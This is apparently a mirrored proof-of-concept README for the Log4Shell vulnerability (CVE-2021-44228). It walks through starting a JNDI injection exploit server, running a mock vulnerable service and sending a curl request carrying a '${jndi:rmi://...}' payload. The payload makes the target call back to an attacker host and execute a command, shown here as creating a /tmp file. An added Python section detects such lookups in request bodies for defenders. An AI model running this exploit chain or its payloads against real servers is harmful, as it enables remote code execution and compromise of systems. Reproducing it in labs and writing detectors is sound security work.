## https://sploitus.com/exploit?id=3B7408B1-9041-550E-9CB8-83E5F609C37B
# cve-2021-44228-log4j

[CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228)

---

# Quickstart

### Concept

- Attacker Server IP: 172.18.5.189
- PRD Server IP: 172.18.5.191


### Step1: Start LDAP/RMI Services. [On Attacker Server]


Download Jar: [JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar](./jar/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar)

Start the services:

```sh
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A "172.18.5.189" -C "touch /tmp/cve-2021-44228-log4j"
```

Output:

![start-ldap-rmi-serices](./screenshot/start-ldap-rmi-serices.jpg)


### Step2: Mock a PRD Service. [On PRD Server]

Download Jar: [log4jRCE-0.0.1-SNAPSHOT.jar](jar/log4jRCE-0.0.1-SNAPSHOT.jar)

Run the service:

```sh
java -jar log4jRCE-0.0.1-SNAPSHOT.jar
```

The service runs on port 8080 and logs whatever is sent to the `/login` API.

![mock_prd_service](./screenshot/mock_prd_service.jpg)


### Step3: Make a request to PRD Service. [Any Servers]

```sh
curl -X POST 'http://172.18.5.191:8080/login' --data-urlencode 'data=${jndi:rmi://172.18.5.189:1099/spring}'
```

Result:

![make_a_request](screenshot/make_a_request.jpg)

The temp file has been created.

![tmp_file](screenshot/tmp_file.jpg)
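For the defending side, the request from Step 3 can be recognised before it reaches the logger. The following is an added example, not part of the original repository: it URL-decodes a form body and reports any JNDI lookup together with the callback host and port. The function names and the sample bodies are constructed for illustration; the first sample is the body that the `curl --data-urlencode` call above produces.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Literal JNDI lookup, e.g. ${jndi:rmi://host:port/name}; matched case-insensitively.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?[^}]*\}",
    re.IGNORECASE,
)

def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so a body that was encoded twice is still inspected."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_jndi_lookups(form_body):
    """Return one finding per JNDI lookup in an x-www-form-urlencoded body."""
    findings = []
    # parse_qsl performs the first round of URL-decoding on each field value.
    for field, value in parse_qsl(form_body, keep_blank_values=True):
        for m in JNDI_RE.finditer(fully_decode(value)):
            findings.append({
                "field": field,
                "scheme": m.group("scheme").lower(),
                "host": m.group("host"),
                "port": int(m.group("port")) if m.group("port") else None,
            })
    return findings

# Constructed sample request bodies for POST /login.
SAMPLE_BODIES = [
    # Body sent by the Step 3 curl command (--data-urlencode output).
    "data=%24%7Bjndi%3Armi%3A%2F%2F172.18.5.189%3A1099%2Fspring%7D",
    # Benign login-style body.
    "data=alice&remember=1",
    # Constructed double-encoded, upper-case variant (port 1389 is an assumption).
    "data=%2524%257BJNDI%253Aldap%253A%252F%252F172.18.5.189%253A1389%252Fa%257D",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        hits = find_jndi_lookups(body)
        print("ALERT" if hits else "ok   ", body[:40], hits)
```

This is a first-pass filter for the literal lookup form shown in Step 3; the extracted host and port are what an egress firewall or proxy log would show when the PRD server calls back.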


# Reference

- [welk1n/JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit)
- [jas502n/Log4j2-CVE-2021-44228](https://github.com/jas502n/Log4j2-CVE-2021-44228)